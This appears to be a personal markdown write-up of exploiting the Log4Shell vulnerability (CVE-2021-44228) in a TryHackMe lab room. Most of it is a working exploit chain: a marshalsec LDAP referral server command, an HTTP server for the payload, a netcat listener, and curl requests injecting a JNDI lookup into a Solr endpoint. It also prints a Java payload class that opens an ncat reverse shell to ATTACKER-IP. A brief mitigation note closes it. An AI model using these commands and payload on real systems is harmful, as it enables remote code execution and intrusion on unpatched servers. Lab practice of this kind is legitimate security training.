LOG4J2-Vulnerability.md

Log4j2 Vulnerability Details: (CVE-2021-44228)

Info

• Sandbox - https://tryhackme.com/r/room/solar
  • You can use WSL on windows via VPN as a attacker sandbox system.
• Sandbox ( Video ) - https://www.youtube.com/watch?v=lJeAgQQaDEw
• Sandbox LDAP Server - https://github.com/mbechler/marshalsec.git

Gist

The exploit is enabled by these following commands :

1. Start the referral LDAP Server ( catches the lookup and forwards to malicious server ) /mnt/c/_TEMP/LOG4JHACK/jvm8/jdk1.8.0_181/bin/java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://ATTACKER-IP:8000/#Exploit"

2. Prep the attacker server to serve the malicious Exploit.class python3 -m http.server 8000

3. Prepare the machine to catch the reverse connection using nc nc -lnvp 9999

4. Trigger the exploit by query injection in target machine curl 'http://TARGET-IP:8983/solr/admin/cores?foo=$\{jndi:ldap://ATTACKER-IP:1389/kuchbhi\}'

Vulnerable Versions

• jdk-8u181 - Java 1.8.0_181
• log4j-api:2.14.1

Useful commands :

• sudo openvpn file.ovpn
• ip addr show | grep inet | grep global
• nc -lnvp 9999
• python3 -m http.server 8000
• curl 'http://TARGET-IP:8983/solr/admin/cores?foo=$\{jndi:ldap://ATTACKER-IP:9999\}'
• mvn clean package -DskipTests

Payload

The java malicious payload is

public class Exploit {
    static{
     try {
         java.lang.Runtime.getRuntime().exec("ncat -e /bin/bash ATTACKER-IP 9999");
     }catch(Exception e){
         e.printStackTrace();
     }
    }
}

Mitigation

• -Dlog4j2.formatMsgNoLookups=true
• When log4j2.formatMsgNoLookups=true is set, it prevents Log4j from performing these lookups during message formatting, thus disabling any dynamic evaluation of ${} placeholders in the log messages.

References

• jdk-8u181-linux-x64.tar.gz - https://www.oracle.com/in/java/technologies/javase/javase8-archive-downloads.html
• https://en.wikipedia.org/wiki/Log4Shell
• https://www.reddit.com/r/sysadmin/comments/reqc6f/log4j_0day_being_exploited_mega_thread_overview/